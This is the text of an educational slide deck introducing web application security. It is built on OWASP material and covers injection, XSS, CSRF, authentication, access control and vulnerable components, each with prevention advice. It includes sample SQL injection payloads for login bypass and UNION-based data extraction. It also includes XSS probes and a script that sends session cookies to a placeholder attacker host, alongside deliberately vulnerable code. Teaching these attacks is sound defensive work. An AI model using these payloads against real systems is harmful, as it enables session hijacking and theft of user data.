WEB APPLICATIONSECURITY

IN A NUTSHELLAN ULTRA-COMPACT INTRO (OR REFRESHER) TO WEB APPLICATION SECURITY

Created by / Björn Kimminich @bkimminich

BJÖRN KIMMINICHApplication Security Officer at Author of open-source pentest training webapp

member and contributor

Kuehne + Nagel (AG & Co.) KGjuice-shop

OWASP OWASP Zed Attack Proxy

FAMOUS LAST WORDS...“Nobody would bother to hack us.”

“Our Firewall, IDS and IPS will keep us safe.”

“We will add security to the system later.”

“What's the worst that could actually happen?”

INJECTION

INJECTION MEANS......tricking an application into including unintended commands in

the data sent to an interpreter.

INTERPRETER MEANS......a program that takes a String and interprets it as a command.

INTERPRETERS ARE USED FOR...SQLHQLOS ShellLDAPXPath...

BYPASSING AUTHENTICATIONWITH SQL INJECTION

String query = "SELECT id FROM users " +               "WHERE name = '" + req.getParameter("username") + "'" +               "AND password = '" + req.getParameter("password") + "'";

The indented use case results in a query like this:SELECT id FROM users WHERE name = 'bjoern' AND password = 'secret'

ATTACK EXAMPLESON AUTHENTICATION QUERIES

Disabling password check for a known username:SELECT id FROM users WHERE name = 'bjoern'‐‐' AND password = '?'

Logging in without even knowing a username:SELECT id FROM users WHERE name = '' or 1=1‐‐' AND password = '?'

SPYING OUT DATAWITH SQL INJECTION

String query =            "SELECT id,author,title,price FROM books " +            "WHERE title LIKE '%" + req.getParameter("query") + "%'";

The indented use case results in a query like this:SELECT id,author,title,price FROM books WHERE title LIKE '%tangled web%'

ATTACK EXAMPLESON DATA RETRIEVAL QUERIES

Probing for right number of result set columns:SELECT [...] WHERE title LIKE '%' UNION SELECT null FROM users‐‐%'

SELECT [...] WHERE title LIKE '%' UNION SELECT null,null FROM users‐‐%'

SELECT [...] WHERE title LIKE '%' UNION SELECT null,null,null FROM users‐‐%'

Using known column names to extract data:SELECT [...] WHERE title LIKE '%' UNION SELECT name,password,email FROM users‐‐%'

PREVENTING INJECTIONAvoid InterpretersBind VariablesPrepared StatementsLeast Privileges for app DB userWhite List Input Validation

CROSS SITE SCRIPTING (XSS)

MALICIOUS CODE IS SENT......to an innocent user's browser through

a form field or URL (Reflected XSS)a previously stored DB record (Persistent XSS)a DOM element of a rich JS client (Local XSS)

POSSIBLE DAMAGE FROM XSSstolen user sessionstolen sensitive datarewriting web pageredirecting to malicious site

XSS VULNERABILITY EXAMPLEhttp://bookwo.rm/titles/search?keywords=raspberry%20pi

The indented use case is to display the keywords above theresults:

<%String keywords = request.getParameter("keywords");List<Book> results = titleSearchService.findByKeywords(keywords.split(" "));%>There are <%=results.count()%> results for your search by <em><%=keywords%></em><table>    <% for (Book book : results) { %>      // render result as table rows    <% } %></table>

XSS ATTACK EXAMPLESProbing for XSS Vulnerability

<script> </script>alert(1)

Stealing User Session<script>

</script>    new Image().src="http://my.evil‐si.te/hijack.php?c="+encodeURI(document.cookie);

Site Defacement<script> </script>document.body.background="http://my.evil‐si.te/image.jpg";

PREVENTING XSSDo not unnecessarily include user supplied input into outputOutput encode all user supplied inputSanitize HTML where user supplied HTML is unavoidableWhite List Input Validation

CROSS SITE REQUEST FORGERY (CSRF)

A VICTIM'S BROWSER......is tricked into issuing a command to a vulnerable webapp. This

is caused by browsers automatically including userauthentication data with each request.

Session CookieBasic AuthenticationAuthorization HTTP Header...

CSRF ATTACK EXAMPLES

PREVENTING CSRFAdd a secret token to all sensitive requestsThis token must not be automatically submittedRequire secondary authentication for sensitive functionsBeware exposing the token in a Referer HTTP header

Make sure your application has no XSS holes that could beexploited to attack others!

BROKEN AUTHENTICATION

TYPICAL AUTHENTICATION FLAWSAllowing weak passwordsStoring SSL certificate insecurelyCredentials passed via insecure http connectionExpose session id's in URLs, via unencrypted network, logs, ...

SIDE CHANNEL ATTACK VECTORSChange Password“Remember me”Forgot PasswordSecret Questions

Make sure your application does not store credentials in itsdatabase unencrypted!

CLASSICAL BROKEN AUTHENTICATION......DUE TO STARTING LOGIN PROCESS ON UNENCRYPTED PAGE

http://sick‐cure‐ba.nk/login.do

POST /login.do HTTP/1.1Host: sick‐cure‐ba.nkCache‐Control: no‐cacheContent‐Type: application/x‐www‐form‐urlencoded

username=bjoern&password=secret

WEAK HASHES PUT PASSWORDS AT RISK......AS DO UNSALTED STRONG HASH ALGORITHMS

id username password1 admin d033e22ae348aeb5660fc2140aec35850c4da997

2 bjoern 2bb80d537b1da3e38bd30361aa855686bde0eacd7162fef6a25fe97bf527a25b

3 localhorst 0f59bd4122f0c02002ec578e4eec306ed48ff2ad0105a307a6dc98c0e9a54fe464e5f807236edce12134067a0b6690891e82490b2b9fa7b4171db43ee8cb4006

Cracking unsalted hashes with a attack is fast, even though the last two of them might seemsufficiently secure given their 256 and 512bit length. You can even crack password hashes online, e.g. at

or via .

Rainbow Table

CrackStation a tweet to @PlzCrack

BROKEN ACCESS CONTROL

COMMON AUTHORIZATION MISTAKESHiding object references instead of restricting accessDisplaying only authorized links and menu choicesTrusting client-side access control mechanismsLack of server-side verification of user privileges

REQUEST TAMPERING FOR PRIVILEGE ESCALATION......AND FINDING ALL KINDS OF ACCESS CONTROL ISSUES

http://logistics‐worldwi.de/showShipment?id=40643108

http://my‐universi.ty/api/students/6503/exams/view

http://document‐warehou.se/landingpage?content=index.html

SECURING AUTHORIZATIONNever rely on “Security by obscurity”Replace direct object references with temporary mappingsRestrict data and functionality access to authorized usersEnforce user or role based permissions

BROKEN ENVIRONMENT

POSSIBLE ENVIRONMENTAL VULNERABILITIESSoftware LibrariesApplication ServerWeb ServerOperating System...

KNOWN VULNERABILITY EXAMPLESComponent Vulnerability AffectedOpenSSL Obtain sensitive information from process memory via crafted

packets that trigger a buffer over-read ( )1.0.1 - 1.0.1f, 1.0.2-beta, 1.0.2-beta1

Unix Bash Execution of arbitrary commands on vulnerable Bash, potentiallycompromising the entire system ( )

CGI, OpenSSH,DHCP, QMail, ...

Struts Remote manipulation of the ClassLoader via the classparameter, which is passed to the getClass() method

before 2.3.16.1

Struts Wildcard cookiesName not properly restricts access to thegetClass() method, which allows ClassLoader manipulation

before 2.3.16.2

Heartbleed

Shellshock

PROTECTION FROM ENVIRONMENTAL VULNERABILITIESMonitor security of used componentsKeep up with patches for used componentsRemove unnecessary stuff on all levelsRestrict use of unapproved components

Java and .NET project dependencies can be monitored by which relies on the . For Javascript and Node.js modules there is which is updated manually

via . Both tools integrate well with typical software build processes.

OWASP Dependency Check NISTNational Vulnerability Database Retire.js

its GitHub project

Q&A

CREDITSPresentation created with reveal.js

The HTML Presentation Framework

Based on free material provided by OWASPThe Open Web Application Security Project

Background image based on by Digital Shodan sephiroth-kmfdm

THE ENDBY BJÖRN KIMMINICH / KIMMINICH.DE

These slides are publicly available on and .GitHub Slideshare